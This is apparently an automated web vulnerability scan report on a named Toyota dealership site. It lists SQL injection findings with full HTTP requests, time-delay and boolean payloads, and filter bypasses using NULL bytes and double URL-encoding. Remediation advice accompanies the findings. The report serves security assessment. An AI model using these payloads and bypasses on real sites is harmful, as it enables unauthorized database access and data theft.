HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:20:41 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:20:42 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:20:42 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 37576
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Sequoia ...[SNIP]... <br /> Inside and out, the 2011 Sequoia never fails to impress with a polished front chrome grille, sporty rear spoiler, and convenient roof racks for transporting oversized cargo. Additionally, all 8 passengers will love the detailed wood-trimmed int ...[SNIP]...
Request 2
GET /Toyota/Sequoia/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000; Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:20:57 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:20:58 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:20:58 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 37311
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Sequoia ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 90730 milliseconds to respond to the request, compared with 17471 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
Request
GET /Toyota'waitfor%20delay'0%3a0%3a20'--/Sienna/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 03:30:27 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 47986
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watso ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /Toyota/Tacoma%20PreRunner/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000; Referer: http://www.google.com/search?hl=en&q='
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:05:40 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:05:40 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:05:41 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 28313
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Tacoma P ...[SNIP]... </div>The 2011 Toyota Tacoma PreRunner is a exceptional pick-up truck with stylish appeal.<br /> ...[SNIP]...
Request 2
GET /Toyota/Tacoma%20PreRunner/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000; Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:05:52 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:05:52 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:05:53 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 28262
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Tacoma P ...[SNIP]...
The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /Toyota/Tacoma%20PreRunner/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792%00'; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 02:48:18 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:48:19 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 02:48:19 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 28261
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Tacoma P ...[SNIP]... </div>The 2011 Toyota Tacoma PreRunner is a exceptional pick-up truck with stylish appeal.<br /> ...[SNIP]...
Request 2
GET /Toyota/Tacoma%20PreRunner/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792%00''; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 02:48:33 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:48:34 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 02:48:34 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 28237
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Tacoma P ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /Toyota/Tundra%20Double%20Cab%204x2/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000; Referer: http://www.google.com/search?hl=en&q=%2527
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:30:45 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:30:45 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:30:46 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 31218
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Tundra D ...[SNIP]... IMG SRC='http://images.carprices.com/pricebooks_data/usa/colorized/2011/Toyota/View/Tundra_Double_Cab_4x2/Base/8241_040.jpg' WIDTH=277 STYLE='float:left; padding: 5px;margin: 5px;'>Drivers looking for exceptional strength should turn to this particular Tundra. With its large 5.7-liter engine, this V8 Tundra is ready to demonstrate its fearless performance. This trim additionally offers 18" steel wheels and c ...[SNIP]...
Request 2
GET /Toyota/Tundra%20Double%20Cab%204x2/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000; Referer: http://www.google.com/search?hl=en&q=%2527%2527
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:30:52 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:30:52 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:30:53 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 31011
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Tundra D ...[SNIP]...
The BIGipServerAPACHE_DEV cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the BIGipServerAPACHE_DEV cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the BIGipServerAPACHE_DEV cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /Toyota/Venza/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000%2527;
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:35:48 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:35:49 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:35:49 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 27957
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Venza at ...[SNIP]... cebooks_data/usa/colorized/2011/Toyota/View/Venza/Base/2822_1F7.jpg' WIDTH=277 STYLE='float:left; padding: 5px;margin: 5px;'>The 4-door Toyota Venza comes equipped with a stellar 6-cylinder engine and exceptional all-wheel drive. You'll love the dual chrome exhaust tips, rear seat personal reading lamps, and the convenient cargo area tonneau cover. <DIV STYLE='float:right; width:850px;'> ...[SNIP]...
Request 2
GET /Toyota/Venza/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000%2527%2527;
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:35:56 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:35:56 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:35:57 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 27883
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Venza at ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /Toyota/Venza/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000; Referer: http://www.google.com/search?hl=en&q=%2527
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:40:08 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:40:08 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:40:09 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 27853
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Venza at ...[SNIP]... </div>Get more with the 2011 Venza from Toyota, a 6-speed electronically-controlled automatic transmission crossover SUV that packs quite the punch. The Venza's performance is enhanced with exceptional ventilated front brakes and rear solid brakes while the electric power steering option eases your control over the steering wheel. <br /> ...[SNIP]...
Request 2
GET /Toyota/Venza/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000; Referer: http://www.google.com/search?hl=en&q=%2527%2527
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:40:11 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:40:11 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:40:12 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 27892
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Venza at ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 19672140'%20or%201%3d1--%20 and 19672140'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /carresearch/BodystylesGroup/confid_fremonttoyota19672140'%20or%201%3d1--%20/make_Toyota/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:08:29 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 05:08:30 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 33550
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>New Toyota Vehicles - Sterling McCall Hyundai Houston</TITLE> <META NAME=KEYWORDS CONTENT="New Toyota Vehicles, Toyota, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota Avalon, 2010 Toyota Avalon, 2010 Toyota Avalon, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry Hybrid, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota FJ Cruiser 4x2, 2010 Toyota FJ Cruiser 4x4, 2010 Toyota FJ Cruiser 4x4, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander Hybrid, 2010 Toyota Highlander Hybrid, 2010 Toyota Land Cruiser, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyot ...[SNIP]...
Request 2
GET /carresearch/BodystylesGroup/confid_fremonttoyota19672140'%20or%201%3d2--%20/make_Toyota/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:08:36 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 05:08:37 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 30222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>New Toyota Vehicles - </TITLE> <META NAME=KEYWORDS CONTENT="New Toyota Vehicles, Toyota, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota Avalon, 2010 Toyota Avalon, 2010 Toyota Avalon, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry Hybrid, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota FJ Cruiser 4x2, 2010 Toyota FJ Cruiser 4x4, 2010 Toyota FJ Cruiser 4x4, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander Hybrid, 2010 Toyota Highlander Hybrid, 2010 Toyota Land Cruiser, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota 